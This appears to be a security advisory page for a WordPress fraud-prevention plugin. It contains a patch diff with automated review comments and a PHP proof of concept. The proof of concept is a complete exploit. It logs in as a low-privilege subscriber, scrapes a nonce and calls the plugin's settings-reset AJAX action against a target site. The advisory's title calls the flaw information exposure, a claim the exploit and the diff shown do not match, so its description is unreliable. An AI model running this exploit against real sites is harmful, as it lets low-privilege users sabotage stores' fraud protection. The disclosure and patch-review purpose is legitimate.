+                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
                 update_post_meta( $post_id, 'WhereUserBanned', 'Place Order' );
                 $post_status = get_post_status( $post_id );
                 if ( 'trash' === $post_status ) {
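Review bot: `filter_input()` returns `null` when the field is absent, so `?? ''` prevents `null` being stored as meta and avoids the PHP 8.1 deprecation when WordPress passes it to string functions; it does not cover `false`, which `filter_input` returns when sanitisation fails, though that is rare with `FILTER_SANITIZE_FULL_SPECIAL_CHARS`. The same ten `update_post_meta` calls repeat verbatim in the hunk at 477; a small helper mapping POST field to meta key would halve the code to keep in sync.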
@@ -477,16 +477,16 @@
                     'post_type'   => 'blocked_user',
                 );
                 $post_id = wp_insert_post( $user );
-                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
-                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) );
+                update_post_meta( $post_id, 'First Name', filter_input( INPUT_POST, 'billing_first_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Last Name', filter_input( INPUT_POST, 'billing_last_name', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'City', filter_input( INPUT_POST, 'billing_city', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Country', filter_input( INPUT_POST, 'billing_country', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Phone', filter_input( INPUT_POST, 'billing_phone', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Company', filter_input( INPUT_POST, 'billing_company', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Postcode', filter_input( INPUT_POST, 'billing_postcode', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 1', filter_input( INPUT_POST, 'billing_address_1', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'Address 2', filter_input( INPUT_POST, 'billing_address_2', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
+                update_post_meta( $post_id, 'State', filter_input( INPUT_POST, 'billing_state', FILTER_SANITIZE_FULL_SPECIAL_CHARS ) ?? '' );
                 update_post_meta( $post_id, 'Attempt', '1' );
                 update_post_meta( $post_id, 'WhereUserBanned', 'Place Order' );
             }
@@ -696,6 +696,29 @@
     }

     /**
+     * Check whether the email exists in blocked users list.
+     *
+     * @param string $email User email.
+     *
+     * @return bool
+     */
+    private function wcbfc_is_blocked_user_email( $email ) {
+        $email = wcblu_safe_trim( sanitize_email( $email ) );
+        if ( empty( $email ) ) {
+            return false;
+        }
+        $cache_key = 'wcbfc_blocked_user_email_' . md5( strtolower( $email ) );
+        $cached = wp_cache_get( $cache_key );
+        if ( false !== $cached ) {
+            return (bool) $cached;
+        }
+        $blocked_user = get_page_by_title( $email, OBJECT, 'blocked_user' );
+        $is_blocked = $blocked_user instanceof WP_Post && 'publish' === $blocked_user->post_status;
+        wp_cache_set( $cache_key, $is_blocked );
+        return $is_blocked;
+    }
+
+    /**
      * @param $email
      *
      * @return string
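Review bot: `get_page_by_title()` in `wcbfc_is_blocked_user_email()` has been deprecated since WordPress 6.2 (a `WP_Query` with `post_type => 'blocked_user'` and `title => $email` is the replacement), and the `wp_cache_set( $cache_key, $is_blocked )` call has no cache group and no expiry, so on a site with a persistent object cache an address the admin unblocks stays cached as blocked until the `'wcbfc_blocked_user_email_' . md5( ... )` key is invalidated. Suggest a plugin-specific group with a short TTL, or deleting the key whenever a `blocked_user` post is saved, trashed or deleted.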
@@ -816,8 +839,7 @@
                                     $code = $delivery_zone_location_result->code;
                                     $type = $delivery_zone_location_result->type;
                                     if ( !empty( $type ) && 'continent' === $type ) {
-                                        $continents = WC_Countries::get_continents();
-                                        // @phpstan-ignore-line
+                                        $continents = ( function_exists( 'WC' ) && WC() && WC()->countries ? WC()->countries->get_continents() : array() );
                                         $continents_and_ccs = wp_list_pluck( $continents, 'countries' );
                                         if ( is_array( $continents_and_ccs ) ) {
                                             foreach ( $continents_and_ccs as $continent_code => $countries ) {
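Review bot: the `array()` fallback on the `$continents` line silently disables continent-based zone matching whenever `WC()->countries` is unavailable, so a site in that state passes continent-restricted checks with no signal; a `wc_get_logger()` entry at that point (as the REST hook added elsewhere in this patch already does) would make it visible. The instance call `WC()->countries->get_continents()` is otherwise the right replacement for the static call on a non-static method that the removed `// @phpstan-ignore-line` was hiding.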
@@ -1707,6 +1729,63 @@
     }

     /**
+     * Log WooCommerce REST requests and optionally block routes.
+     *
+     * @param mixed           $response Response from a REST request.
+     * @param array           $handler  Route handler.
+     * @param WP_REST_Request $request  REST request object.
+     *
+     * @return mixed
+     */
+    public function wcbfc_block_rest_request( $response, $handler, $request ) {
+        $general_options_raw = get_option( 'wcblu_general_option' );
+        $general_options = ( empty( $general_options_raw ) ? array() : json_decode( $general_options_raw, true ) );
+        $acp_enabled = ( !empty( $general_options['wcbfc_acp_status'] ) ? $general_options['wcbfc_acp_status'] : '0' );
+        $disable_rest_api = ( !empty( $general_options['wcbfc_acp_disable_rest_api'] ) ? $general_options['wcbfc_acp_disable_rest_api'] : '0' );
+        if ( '1' !== $acp_enabled ) {
+            return $response;
+        }
+        $route = $request->get_route();
+        if ( 0 !== strpos( $route, '/wc/' ) ) {
+            return $response;
+        }
+        if ( function_exists( 'wc_get_logger' ) ) {
+            $logger = wc_get_logger();
+            $logger->info( 'REST request: Method = ' . $request->get_method() . ', Route = ' . $route, array(
+                'source' => 'wcblu-rest-blocked-request-log',
+            ) );
+        }
+        $default_blocked_routes = array(( '1' === $disable_rest_api ? '/wc/v3/orders/' : '' ), ( '1' === $disable_rest_api ? '/wc/v3/orders' : '' ));
+        $blocked_routes = apply_filters( 'wcblu_rest_blocked_routes', $default_blocked_routes );
+        foreach ( $blocked_routes as $blocked ) {
+            if ( 0 === strpos( $route, $blocked ) ) {
+                return new WP_Error('rest_forbidden_route', sprintf( __( 'The REST API route "%s" is disabled on this site.', 'woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers' ), esc_html( $route ) ), array(
+                    'status' => 403,
+                ));
+            }
+        }
+        return $response;
+    }
+
+    /**
+     * Get WooCommerce order attribution origin.
+     *
+     * @param WC_Order $order Order object.
+     *
+     * @return string
+     */
+    private function wcbfc_get_order_origin( $order ) {
+        if ( !is_a( $order, 'WC_Order' ) ) {
+            return '';
+        }
+        $origin = $order->get_meta( '_wc_order_attribution_source_type', true );
+        if ( empty( $origin ) ) {
+            $origin = $order->get_created_via();
+        }
+        return ( is_string( $origin ) ? $origin : '' );
+    }
+
+    /**
      * Function to get country by ip (Using wp_remote_post)
      *
      * @param string $ip
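Review bot: `$default_blocked_routes` in `wcbfc_block_rest_request()` holds two empty strings whenever `wcbfc_acp_disable_rest_api` is not `'1'`, and on PHP 8 `strpos( $route, '' )` returns `0`, so `0 === strpos( $route, $blocked )` matches every `/wc/` route and the hook returns `rest_forbidden_route` (403) for the entire WooCommerce REST API as soon as ACP is enabled, regardless of the disable flag (PHP 7 returns `false` with a warning instead). Build the list conditionally, e.g. `$default_blocked_routes = ( '1' === $disable_rest_api ? array( '/wc/v3/orders' ) : array() );` (the `/wc/v3/orders/` entry is redundant, since `/wc/v3/orders` is already its prefix), and run `array_filter()` over the `wcblu_rest_blocked_routes` filter result so a callback cannot reintroduce an empty entry. Separately, the `info` log line fires for every `/wc/` REST request while ACP is on, not only for blocked ones as the `wcblu-rest-blocked-request-log` source name suggests.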
--- a/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/woocommerce-blocker.php
+++ b/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/woocommerce-blocker.php
@@ -16,7 +16,7 @@
  * Plugin Name:       Fraud Prevention For WooCommerce and EDD
  * Plugin URI:        https://www.thedotstore.com/
  * Description:       Prevent fake orders and Blacklist fraud customers allows your WooCommerce store to refuse orders from specific user, based on blacklist rules.
- * Version:           2.3.2
+ * Version:           2.3.3
  * Author:            theDotstore
  * Author URI:        https://www.thedotstore.com/
  * License:           GPL-2.0+
@@ -25,8 +25,8 @@
  * Domain Path:       /languages
  *
  *
- * WP tested up to:      6.9
- * WC tested up to:      10.4.3
+ * WP tested up to:      6.9.1
+ * WC tested up to:      10.5.2
  * WC requires at least: 3.0
  * Requires PHP:         5.6
  * Requires at least:    5.0
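Review bot: `Requires PHP: 5.6` is left unchanged while the `?? ''` fallbacks added to the `update_post_meta()` calls in the admin class need PHP 7.0 or later (null coalescing operator); either bump `Requires PHP` to 7.0 here or use `isset()`/ternary fallbacks in that hunk.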
@@ -85,7 +85,7 @@
     define( 'WB_PLUGIN_PATH', plugin_dir_path( __FILE__ ) );
 }
 if ( !defined( 'WB_PLUGIN_VERSION' ) ) {
-    define( 'WB_PLUGIN_VERSION', '2.3.2' );
+    define( 'WB_PLUGIN_VERSION', '2.3.3' );
 }
 if ( !defined( 'WB_STORE_URL' ) ) {
     define( 'WB_STORE_URL', 'https://www.thedotstore.com/' );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24553 - Fraud Prevention For Woocommerce <= 2.3.2 - Authenticated (Subscriber+) Information Exposure

$target_url = 'http://target-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate and obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
$response = curl_exec($ch);

// Step 2: Access a plugin admin page to extract the nonce from the localized script
$admin_page_url = $target_url . '/wp-admin/admin.php?page=wcblu-dashboard';
curl_setopt($ch, CURLOPT_URL, $admin_page_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract the nonce from the adminajax object in the page source
if (preg_match('/adminajax\s*=\s*({[^}]+})/', $response, $matches)) {
    $json = json_decode($matches[1], true);
    $nonce = $json['nonce'] ?? null;
} else {
    // Fallback: try to find the nonce in a script tag
    if (preg_match('/"nonce"\s*:\s*"([a-f0-9]+)"/', $response, $matches)) {
        $nonce = $matches[1];
    } else {
        die("Could not extract nonce from page source.\n");
    }
}

echo "Extracted nonce: $nonce\n";

// Step 3: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'wcblu_reset_settings',
    'nonce' => $nonce
]));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Analyze response
if ($http_code === 200 && trim($response) === '') {
    echo "SUCCESS: Plugin settings reset. The 'wcblu_option' was cleared.\n";
    echo "This indicates the vulnerability was successfully exploited.\n";
} else {
    echo "Response Code: $http_code\n";
    echo "Response Body: $response\n";
    echo "The target may be patched or the nonce invalid.\n";
}

?>
